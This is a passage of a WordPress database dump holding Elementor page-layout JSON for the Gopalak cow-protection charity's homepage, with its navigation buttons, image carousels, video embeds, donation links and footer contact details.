Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11882,1970,'_elementor_page_assets','a:0:{}'),(11884,1971,'_elementor_edit_mode','builder'),(11885,1971,'_elementor_template_type','wp-page'),(11886,1971,'_elementor_version','3.7.8'),(11887,1971,'_wp_page_template','elementor_canvas'),(11888,1971,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":0,\"bottom\":\"4\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11889,1971,'_elementor_page_assets','a:0:{}'),(11891,1972,'_elementor_edit_mode','builder'),(11892,1972,'_elementor_template_type','wp-page'),(11893,1972,'_elementor_version','3.7.8'),(11894,1972,'_wp_page_template','elementor_canvas'),(11895,1972,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"